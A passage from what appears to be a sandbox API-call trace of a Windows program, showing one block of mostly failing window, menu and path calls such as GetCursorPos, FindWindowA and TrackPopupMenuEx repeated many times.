out: pszPath=0x0) returned 0 [0027.568] PathFileExistsW (pszPath=0x0) returned 0 [0027.568] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.568] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.568] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.568] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.568] GetMenu (hWnd=0x0) returned 0x0 [0027.568] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.568] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.568] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.568] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.568] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.568] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.568] GetStockObject (i=6) returned 0x1b00018 [0027.568] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.568] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.568] PathFileExistsW (pszPath=0x0) returned 0 [0027.568] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.568] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.568] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.569] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.569] GetMenu (hWnd=0x0) returned 0x0 [0027.569] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.569] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.569] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.569] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.569] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.569] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.569] GetStockObject (i=6) returned 0x1b00018 [0027.569] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.569] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.569] PathFileExistsW (pszPath=0x0) returned 0 [0027.569] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.569] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.569] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.569] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.569] GetMenu (hWnd=0x0) returned 0x0 [0027.569] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.569] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.569] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.569] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.569] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.569] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.569] GetStockObject (i=6) returned 0x1b00018 [0027.569] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.569] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.569] PathFileExistsW (pszPath=0x0) returned 0 [0027.569] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.569] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.569] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.569] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.569] GetMenu (hWnd=0x0) returned 0x0 [0027.569] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x59f) returned -1 [0027.569] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.570] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.570] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.570] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.570] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.570] GetStockObject (i=6) returned 0x1b00018 [0027.570] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.570] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.570] PathFileExistsW (pszPath=0x0) returned 0 [0027.570] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.570] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.570] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.570] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.570] GetMenu (hWnd=0x0) returned 0x0 [0027.570] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.570] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.570] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.570] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.570] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.570] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.570] GetStockObject (i=6) returned 0x1b00018 [0027.570] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.570] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.570] PathFileExistsW (pszPath=0x0) returned 0 [0027.570] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.570] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.570] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.570] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.570] GetMenu (hWnd=0x0) returned 0x0 [0027.570] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.570] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.570] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.570] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.570] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.571] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.571] GetStockObject (i=6) returned 0x1b00018 [0027.571] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.571] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.571] PathFileExistsW (pszPath=0x0) returned 0 [0027.571] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.571] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.571] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.571] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.571] GetMenu (hWnd=0x0) returned 0x0 [0027.571] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.571] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.571] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.571] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.571] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.571] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.571] GetStockObject (i=6) returned 0x1b00018 [0027.571] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.571] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.571] PathFileExistsW (pszPath=0x0) returned 0 [0027.571] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.571] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.571] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.571] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.571] GetMenu (hWnd=0x0) returned 0x0 [0027.571] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.571] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.571] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.571] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.571] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.571] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.571] GetStockObject (i=6) returned 0x1b00018 [0027.571] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.571] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.572] PathFileExistsW (pszPath=0x0) returned 0 [0027.572] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.572] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.572] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.572] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.572] GetMenu (hWnd=0x0) returned 0x0 [0027.572] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0027.572] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.572] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.572] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.572] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.572] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.572] GetStockObject (i=6) returned 0x1b00018 [0027.572] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.572] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.572] PathFileExistsW (pszPath=0x0) returned 0 [0027.572] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.572] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.572] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.572] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.572] GetMenu (hWnd=0x0) returned 0x0 [0027.572] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.572] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.572] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.572] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.572] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.572] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.572] GetStockObject (i=6) returned 0x1b00018 [0027.572] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.572] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.572] PathFileExistsW (pszPath=0x0) returned 0 [0027.572] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.572] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.573] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.573] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.573] GetMenu (hWnd=0x0) returned 0x0 [0027.573] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.573] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.573] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.573] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.573] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.573] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.573] GetStockObject (i=6) returned 0x1b00018 [0027.573] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.573] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.573] PathFileExistsW (pszPath=0x0) returned 0 [0027.573] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.573] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.573] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.573] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.573] GetMenu (hWnd=0x0) returned 0x0 [0027.573] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.573] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.573] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.573] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.573] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.573] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.573] GetStockObject (i=6) returned 0x1b00018 [0027.573] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.573] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.573] PathFileExistsW (pszPath=0x0) returned 0 [0027.573] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.573] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.573] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.573] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.573] GetMenu (hWnd=0x0) returned 0x0 [0027.574] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.574] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.574] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.574] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.574] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.574] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.574] GetStockObject (i=6) returned 0x1b00018 [0027.574] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.574] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.574] PathFileExistsW (pszPath=0x0) returned 0 [0027.574] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.574] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.574] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.574] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.574] GetMenu (hWnd=0x0) returned 0x0 [0027.574] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4b7) returned -1 [0027.574] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.574] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.574] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.574] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.574] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.574] GetStockObject (i=6) returned 0x1b00018 [0027.574] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.574] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.574] PathFileExistsW (pszPath=0x0) returned 0 [0027.574] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.574] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.574] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.574] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.574] GetMenu (hWnd=0x0) returned 0x0 [0027.574] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.574] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.574] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.575] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.575] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.575] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.575] GetStockObject (i=6) returned 0x1b00018 [0027.575] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.575] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.575] PathFileExistsW (pszPath=0x0) returned 0 [0027.575] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.575] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.575] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.575] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.575] GetMenu (hWnd=0x0) returned 0x0 [0027.575] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.575] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.575] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.575] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.575] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.575] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.575] GetStockObject (i=6) returned 0x1b00018 [0027.575] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.575] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.575] PathFileExistsW (pszPath=0x0) returned 0 [0027.575] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.575] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.575] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.575] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.575] GetMenu (hWnd=0x0) returned 0x0 [0027.575] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.575] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.575] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.575] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.575] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.576] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.576] GetStockObject (i=6) returned 0x1b00018 [0027.576] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.576] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.576] PathFileExistsW (pszPath=0x0) returned 0 [0027.576] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.576] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.576] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.576] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.576] GetMenu (hWnd=0x0) returned 0x0 [0027.576] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.576] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.576] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.576] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.576] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.576] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.576] GetStockObject (i=6) returned 0x1b00018 [0027.576] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.576] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.576] PathFileExistsW (pszPath=0x0) returned 0 [0027.576] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.576] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.576] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.576] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.576] GetMenu (hWnd=0x0) returned 0x0 [0027.576] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x13e) returned -1 [0027.576] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.576] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.576] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.576] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.576] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.576] GetStockObject (i=6) returned 0x1b00018 [0027.577] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.577] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.577] PathFileExistsW (pszPath=0x0) returned 0 [0027.577] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.577] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.577] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.577] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.577] GetMenu (hWnd=0x0) returned 0x0 [0027.577] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.577] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.577] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.577] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.577] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.577] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, 